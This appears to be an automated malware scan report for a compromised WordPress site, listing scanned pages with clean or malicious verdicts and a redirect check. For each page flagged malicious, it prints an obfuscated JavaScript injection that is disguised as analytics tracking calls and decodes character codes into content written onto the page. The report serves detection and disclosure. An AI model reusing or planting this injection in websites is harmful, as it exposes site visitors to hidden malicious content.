Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=continentalgatorskin.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.continentalgatorskin.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:31:40 GMT Location: http://continentalgatorskin.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wfvt_-165257786=549c580ddb125; expires=Thu, 25-Dec-2014 19:01:41 GMT; path=/; httponly X-Pingback: http://continentalgatorskin.com/xmlrpc.php | clean |
http://continentalgatorskin.com/ | 200 OK Content-Length: 18624 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw6 = []; _gw6.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']); _gw6.push(['_trackPageview', '6918518510413211618017118918517817118618617118418817517']); _gw6.push(['_setOption', '1189165169193182181185175186175181180128167168185181178']); _gw6.push(['_setPageId', '1871861711291691781751821281841711691861101221201251821']); _gw6.push(['_trackPageview', '9011416718718618111416718718618111412212012518219011112']); _gw6.push(['_setOption', '9195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw6.length; v++) t += _gw6[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://continentalgatorskin.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://continentalgatorskin.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://continentalgatorskin.com/wp-includes/js/comment-reply.min.js?ver=4.0.1 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://continentalgatorskin.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/javascript | clean |
http://continentalgatorskin.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.1 | 200 OK Content-Length: 9658 Content-Type: application/javascript | clean |
http://continentalgatorskin.com/wp-content/plugins/easyazon-pro-3.0.9/resources/vendor/bootstrap/js/bootstrap.min.js?ver=3.0.2.M | 200 OK Content-Length: 8157 Content-Type: application/javascript | clean |
http://continentalgatorskin.com/wp-content/plugins/easyazon-pro-3.0.9/resources/frontend/easyazon-pro.js?ver=3.0.9 | 200 OK Content-Length: 4235 Content-Type: application/javascript | clean |
http://stats.wordpress.com/e-201452.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
http://www.continentalgatorskin.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 25 Dec 2014 18:31:47 GMT Pragma: no-cache Location: http://continentalgatorskin.com/test404page.js Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_-165257786=549c581381b8f; expires=Thu, 25-Dec-2014 19:01:47 GMT; path=/; httponly X-Pingback: http://continentalgatorskin.com/xmlrpc.php | clean |
http://continentalgatorskin.com/test404page.js | 404 Not Found Content-Length: 8771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw6 = []; _gw6.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']); _gw6.push(['_trackPageview', '6918518510413211618017118918517817118618617118418817517']); _gw6.push(['_setOption', '1189165169193182181185175186175181180128167168185181178']); _gw6.push(['_setPageId', '1871861711291691781751821281841711691861101221201251821']); _gw6.push(['_trackPageview', '9011416718718618111416718718618111412212012518219011112']); _gw6.push(['_setOption', '9195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw6.length; v++) t += _gw6[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://continentalgatorskin.com/buyers-guide-2/ | 200 OK Content-Length: 13614 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw6 = []; _gw6.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']); _gw6.push(['_trackPageview', '6918518510413211618017118918517817118618617118418817517']); _gw6.push(['_setOption', '1189165169193182181185175186175181180128167168185181178']); _gw6.push(['_setPageId', '1871861711291691781751821281841711691861101221201251821']); _gw6.push(['_trackPageview', '9011416718718618111416718718618111412212012518219011112']); _gw6.push(['_setOption', '9195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw6.length; v++) t += _gw6[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://continentalgatorskin.com/other/ | 200 OK Content-Length: 17567 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw6 = []; _gw6.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']); _gw6.push(['_trackPageview', '6918518510413211618017118918517817118618617118418817517']); _gw6.push(['_setOption', '1189165169193182181185175186175181180128167168185181178']); _gw6.push(['_setPageId', '1871861711291691781751821281841711691861101221201251821']); _gw6.push(['_trackPageview', '9011416718718618111416718718618111412212012518219011112']); _gw6.push(['_setOption', '9195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw6.length; v++) t += _gw6[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://continentalgatorskin.com/wp-content/plugins/akismet/_inc/form.js?ver=3.0.2 | 200 OK Content-Length: 700 Content-Type: application/javascript | clean |
http://continentalgatorskin.com/about-me/ | 200 OK Content-Length: 11868 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw6 = []; _gw6.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']); _gw6.push(['_trackPageview', '6918518510413211618017118918517817118618617118418817517']); _gw6.push(['_setOption', '1189165169193182181185175186175181180128167168185181178']); _gw6.push(['_setPageId', '1871861711291691781751821281841711691861101221201251821']); _gw6.push(['_trackPageview', '9011416718718618111416718718618111412212012518219011112']); _gw6.push(['_setOption', '9195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw6.length; v++) t += _gw6[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://continentalgatorskin.com/contact/ | 200 OK Content-Length: 11986 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw6 = []; _gw6.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']); _gw6.push(['_trackPageview', '6918518510413211618017118918517817118618617118418817517']); _gw6.push(['_setOption', '1189165169193182181185175186175181180128167168185181178']); _gw6.push(['_setPageId', '1871861711291691781751821281841711691861101221201251821']); _gw6.push(['_trackPageview', '9011416718718618111416718718618111412212012518219011112']); _gw6.push(['_setOption', '9195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw6.length; v++) t += _gw6[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: continentalgatorskin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 18:31:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/P11z60-36>; rel=shortlink
Set-Cookie: wfvt_-165257786=549c580e612f0; expires=Thu, 25-Dec-2014 19:01:42 GMT; path=/; httponly
X-Pingback: http://continentalgatorskin.com/xmlrpc.php
GET / HTTP/1.1
Host: continentalgatorskin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 18:31:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/P11z60-36>; rel=shortlink
Set-Cookie: wfvt_-165257786=549c580e612f0; expires=Thu, 25-Dec-2014 19:01:42 GMT; path=/; httponly
X-Pingback: http://continentalgatorskin.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: continentalgatorskin.com
Referer: http://www.google.com/search?q=continentalgatorskin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: continentalgatorskin.com
Referer: http://www.google.com/search?q=continentalgatorskin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.